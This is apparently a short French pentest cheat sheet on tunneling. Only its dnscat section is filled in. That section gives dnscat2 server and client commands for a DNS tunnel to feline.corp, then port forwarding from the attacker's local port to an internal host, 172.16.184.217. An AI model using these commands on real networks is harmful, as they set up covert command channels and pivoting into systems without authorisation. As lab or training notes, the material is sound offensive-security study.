Tunneling

HTTP

DNS

DNSCat

L’outil dnscat permet de créer un tunnel de communication entre deux machines à l’aide de DNS. Sa mise en œuvre est assez aisé:

# On server
dnscat2-server feline.corp

# On client
dnscat feline.corp

Une fois la communication établie, il est possible de mettre en place du transfert de port à partir du serveur:

# Lister les tunnels
dnscat2> windows
# Interagir avec un tunnel
dnscat2> window -i 1
# Créer un transfert de port
command (pgdatabase01) 1> listen 127.0.0.1:4455 172.16.184.217:4646

Dans le cas ci-dessus, nous avons créé un transfert entre le port 4455 de l’attaquant et le port 4646 de la machine 172.16.184.217.

ICMP